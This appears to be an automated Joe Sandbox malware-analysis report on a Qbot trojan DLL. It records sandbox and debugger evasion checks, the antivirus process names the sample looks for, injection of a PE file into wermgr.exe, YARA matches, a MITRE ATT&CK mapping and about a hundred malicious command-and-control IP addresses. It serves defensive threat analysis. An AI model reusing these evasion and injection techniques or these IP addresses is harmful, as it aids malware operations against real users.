Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7684	Thread sleep count: 203 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 7892	Thread sleep time: -45000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_16-13026

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_16-11962

Source: C:\Windows\SysWOW64\wermgr.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_1000B967 GetSystemInfo,

16_2_1000B967

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_10009E70 FindFirstFileW,FindNextFileW,

16_2_10009E70

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6AD814B0 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,

3_2_6AD814B0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6AD81F50 mov eax, dword ptr fs:[00000030h]	3_2_6AD81F50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_10001015 mov eax, dword ptr fs:[00000030h]	16_2_10001015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_100021CD mov eax, dword ptr fs:[00000030h]	16_2_100021CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ADC5370 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,EnterCriticalSection,TlsGetValue,GetLastError,TlsGetValue,GetLastError,LeaveCriticalSection,

3_2_6ADC5370

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 5D0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 5A0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1193C50	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 5A0000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 5D0000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Windows\SysWOW64\wermgr.exe base: 5A0000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ADB3D50 cpuid

3_2_6ADB3D50

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ADC52A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_6ADC52A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_1000BC31 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,

16_2_1000BC31

Source: rundll32.exe, 00000010.00000003.394592037.000000000474F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000010.00000003.394592037.000000000474F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000010.00000003.394592037.000000000474F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe, 00000010.00000003.394592037.000000000474F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000010.00000003.394592037.000000000474F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: Amcache.hve.8.dr	Binary or memory string: procexp.exe
Source: rundll32.exe, 00000010.00000003.394592037.000000000474F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.rundll32.exe.2960978.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2960978.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.404593397.000000000294A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.405110425.00000000046D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.rundll32.exe.2960978.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2960978.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.404593397.000000000294A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.405110425.00000000046D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 DLL Side-Loading	311 Process Injection	11 Masquerading	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	1 Input Capture	21 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Rundll32	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
050_qbot.dll	46%	ReversingLabs	Win32.Trojan.Zusy
050_qbot.dll	57%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xfinity.com	68.87.41.40	true	false		high
www.xfinity.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://xfinity.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.xfinity.com/mobile/policies/broadband-disclosures	national[1].htm.22.dr	false	high
http://upx.sf.net	Amcache.hve.8.dr	false	high
https://www.xfinity.com/learn/internet-service/acp	national[1].htm.22.dr	false	high
https://www.xfinity.com/networkmanagement	national[1].htm.22.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.2.18.164	unknown	United States	174	COGENT-174US	true
2.82.8.80	unknown	Portugal	3243	MEO-RESIDENCIALPT	true
70.160.67.203	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
83.110.223.61	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
209.171.160.69	unknown	Canada	852	ASN852CA	true
84.215.202.8	unknown	Norway	41164	GET-NOGETNorwayNO	true
184.182.66.109	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
200.84.211.255	unknown	Venezuela	8048	CANTVServiciosVenezuelaVE	true
125.99.69.178	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	true
174.4.89.3	unknown	Canada	6327	SHAWCA	true
121.121.108.120	unknown	Malaysia	9534	MAXIS-AS1-APBinariangBerhadMY	true
161.142.103.187	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
213.64.33.92	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
114.143.176.236	unknown	India	17762	HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdIN	true
24.234.220.88	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
67.70.120.249	unknown	Canada	577	BACOMCA	true
73.88.173.113	unknown	United States	7922	COMCAST-7922US	true
72.205.104.134	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
117.195.17.148	unknown	India	9829	BSNL-NIBNationalInternetBackboneIN	true
69.160.121.6	unknown	Jamaica	33576	DIG001JM	true
176.133.4.230	unknown	France	5410	BOUYGTEL-ISPFR	true
183.87.163.165	unknown	India	132220	JPRDIGITAL-INJPRDigitalPvtLtdIN	true
184.181.75.148	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
70.49.205.198	unknown	Canada	577	BACOMCA	true
87.221.153.182	unknown	Spain	12479	UNI2-ASES	true
70.50.1.252	unknown	Canada	577	BACOMCA	true
85.101.239.116	unknown	Turkey	9121	TTNETTR	true
181.4.225.225	unknown	Argentina	7303	TelecomArgentinaSAAR	true
100.4.163.158	unknown	United States	701	UUNETUS	true
103.141.50.43	unknown	India	133693	SKISP-AS-INSriKrishnaInternetServicesPrivateLimitedI	true
70.50.83.216	unknown	Canada	577	BACOMCA	true
92.1.170.110	unknown	United Kingdom	13285	OPALTELECOM-ASTalkTalkCommunicationsLimitedGB	true
64.121.161.102	unknown	United States	6079	RCN-ASUS	true
96.56.197.26	unknown	United States	6128	CABLE-NET-1US	true
188.28.19.84	unknown	United Kingdom	206067	H3GUKGB	true
125.99.76.102	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	true
81.101.185.146	unknown	United Kingdom	5089	NTLGB	true
116.75.63.183	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	true
68.87.41.40	xfinity.com	United States	7922	COMCAST-7922US	false
124.246.122.199	unknown	Singapore	63850	ENTRUSTICT-AS-APQRHUBPTYLTDTAEntrustICTAU	true
147.147.30.126	unknown	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	true
109.130.247.84	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	true
75.109.111.89	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	true
88.126.94.4	unknown	France	12322	PROXADFR	true
124.122.47.148	unknown	Thailand	17552	TRUE-AS-APTrueInternetCoLtdTH	true
66.241.183.99	unknown	United States	16604	HUNTEL-NETUS	true
180.151.19.13	unknown	India	10029	SHYAMSPECTRA-ASSHYAMSPECTRAPVTLTDIN	true
94.204.202.106	unknown	United Arab Emirates	15802	DU-AS1AE	true
47.205.25.170	unknown	United States	5650	FRONTIER-FRTRUS	true
95.45.50.93	unknown	Ireland	5466	EIRCOMInternetHouseIE	true
103.212.19.254	unknown	India	132956	VNET-ASVNETNETWORKSPVTLTDIN	true
85.61.165.153	unknown	Spain	12479	UNI2-ASES	true
91.160.70.68	unknown	France	12322	PROXADFR	true
201.143.215.69	unknown	Mexico	8151	UninetSAdeCVMX	true
184.63.133.131	unknown	United States	7155	VIASAT-SP-BACKBONEUS	true
203.109.44.236	unknown	India	135777	NECONN-ASShreenortheastConnectAndServicesPvtLtdIN	true
90.104.151.37	unknown	France	3215	FranceTelecom-OrangeFR	true
201.244.108.183	unknown	Colombia	19429	ETB-ColombiaCO	true
2.49.63.160	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
103.42.86.42	unknown	India	133660	EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLt	true
80.6.50.34	unknown	United Kingdom	5089	NTLGB	true
175.156.217.7	unknown	Singapore	4773	MOBILEONELTD-AS-APMobileOneLtdMobileInternetServicePr	true
103.139.242.6	unknown	India	138798	MUTINY-AS-INMutinySystemsPrivateLimitedIN	true
27.0.48.233	unknown	India	132573	SAINGN-AS-INSAINGNNetworkServicesIN	true
70.28.50.223	unknown	Canada	577	BACOMCA	true
173.17.45.60	unknown	United States	30036	MEDIACOM-ENTERPRISE-BUSINESSUS	true
81.229.117.95	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
70.64.77.115	unknown	Canada	6327	SHAWCA	true
87.252.106.39	unknown	Italy	48544	TECNOADSL-ASIT	true
79.77.142.22	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	true
98.163.227.79	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
93.187.148.45	unknown	United Kingdom	8680	SURE-INTERNATIONAL-LIMITEDGB	true
186.75.95.6	unknown	Panama	11556	CableWirelessPanamaPA	true
50.68.186.195	unknown	Canada	6327	SHAWCA	true
45.62.70.33	unknown	Canada	40440	NRTC-CA	true
83.249.198.100	unknown	Sweden	39651	COMHEM-SWEDENSE	true
12.172.173.82	unknown	United States	2386	INS-ASUS	true
47.199.241.39	unknown	United States	5650	FRONTIER-FRTRUS	true
79.168.224.165	unknown	Portugal	2860	NOS_COMUNICACOESPT	true
199.27.66.213	unknown	United States	40608	HCTNEBRASKAUS	true
200.44.198.47	unknown	Venezuela	8048	CANTVServiciosVenezuelaVE	true
176.142.207.63	unknown	France	5410	BOUYGTEL-ISPFR	true
86.173.2.12	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
45.62.75.250	unknown	Canada	40440	NRTC-CA	true
92.154.17.149	unknown	France	3215	FranceTelecom-OrangeFR	true
90.29.86.138	unknown	France	3215	FranceTelecom-OrangeFR	true
174.58.146.57	unknown	United States	7922	COMCAST-7922US	true
223.166.13.95	unknown	China	17621	CNCGROUP-SHChinaUnicomShanghainetworkCN	true
5.192.141.228	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
65.95.141.84	unknown	Canada	577	BACOMCA	true
75.98.154.19	unknown	United States	32444	SAFELINK-MVUS	true
77.126.99.230	unknown	Israel	9116	GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	true
103.123.223.133	unknown	India	138329	KWS-AS-APKenstarWebSolutionsPrivateLimitedIN	true
74.12.147.139	unknown	Canada	577	BACOMCA	true
92.9.45.20	unknown	United Kingdom	13285	OPALTELECOM-ASTalkTalkCommunicationsLimitedGB	true
113.11.92.30	unknown	Bangladesh	7565	BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD	true
77.86.98.236	unknown	United Kingdom	12390	KINGSTON-UK-ASGB	true
103.140.174.20	unknown	India	138763	PRAVEEN1-ASPraveenTelecomPvtLtdIN	true
78.192.109.105	unknown	France	12322	PROXADFR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	882803
Start date and time:	2023-06-06 20:11:32 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	050_qbot.dll (renamed file extension from dat to dll, renamed because original name is a hash value)
Original Sample Name:	050_qbot.dat
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@30/21@2/100
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 27.4% (good quality ratio 26.1%) Quality average: 78.3% Quality standard deviation: 25.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 44
Cookbook Comments:	Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.89.179.12, 52.168.117.173, 104.77.34.176
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, e10994.dscx.akamaiedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, www.xfinity.com.edgekey.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com
Execution Graph export aborted for target rundll32.exe, PID 7348 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
20:12:41	API Interceptor	4x Sleep call for process: WerFault.exe modified
20:12:42	API Interceptor	1x Sleep call for process: loaddll32.exe modified
20:12:52	API Interceptor	9x Sleep call for process: wermgr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
38.2.18.164	042_qbot.dll	Get hash	malicious	Qbot	Browse
	042_qbot.dll	Get hash	malicious	Qbot	Browse
	qbot1.dll	Get hash	malicious	Qbot	Browse
	distantly.dat.dll	Get hash	malicious	Qbot	Browse
2.82.8.80	042_qbot.dll	Get hash	malicious	Qbot	Browse
	042_qbot.dll	Get hash	malicious	Qbot	Browse
	qbot1.dll	Get hash	malicious	Qbot	Browse
	distantly.dat.dll	Get hash	malicious	Qbot	Browse
	qbot1.dll	Get hash	malicious	Qbot	Browse
	oOo.dat.dll	Get hash	malicious	Qbot	Browse
	photographed.dat.dll	Get hash	malicious	Qbot	Browse
	F086.dll	Get hash	malicious	Qbot	Browse
	A649.dll	Get hash	malicious	Qbot	Browse
	F072.dll	Get hash	malicious	Qbot	Browse
	F086.dll	Get hash	malicious	Qbot	Browse
	A290.dll	Get hash	malicious	Qbot	Browse
	A649.dll	Get hash	malicious	Qbot	Browse
	5q4psw.msi	Get hash	malicious	Qbot	Browse
	15dasx.msi	Get hash	malicious	Qbot	Browse
	5q4psw.msi	Get hash	malicious	Qbot	Browse
	15dasx.msi	Get hash	malicious	Qbot	Browse
	licking.dll	Get hash	malicious	Qbot	Browse
	licking.dll	Get hash	malicious	Qbot	Browse
	main2.dll	Get hash	malicious	Qbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MEO-RESIDENCIALPT	042_qbot.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	042_qbot.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	MtaQNlIGAH.elf	Get hash	malicious	Mirai	Browse	85.245.52.8
	wuXRy6x0DL.elf	Get hash	malicious	Mirai	Browse	188.80.226.115
	droidbot	Get hash	malicious	Unknown	Browse	85.247.209.200
	LNV3upV1D7.elf	Get hash	malicious	Mirai	Browse	144.67.94.28
	YX6QtfYohw.elf	Get hash	malicious	Unknown	Browse	85.244.176.127
	pfbZRXBuZY.elf	Get hash	malicious	Mirai	Browse	85.244.28.236
	qbot1.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	distantly.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	qbot1.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	oOo.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	4FvxWvpyEa.elf	Get hash	malicious	Mirai	Browse	85.244.76.113
	photographed.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Mirai	Browse	2.80.41.222
	F086.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	A649.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	F072.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	F086.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	A290.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
COGENT-174US	qXW7G51t86.elf	Get hash	malicious	Unknown	Browse	38.15.249.222
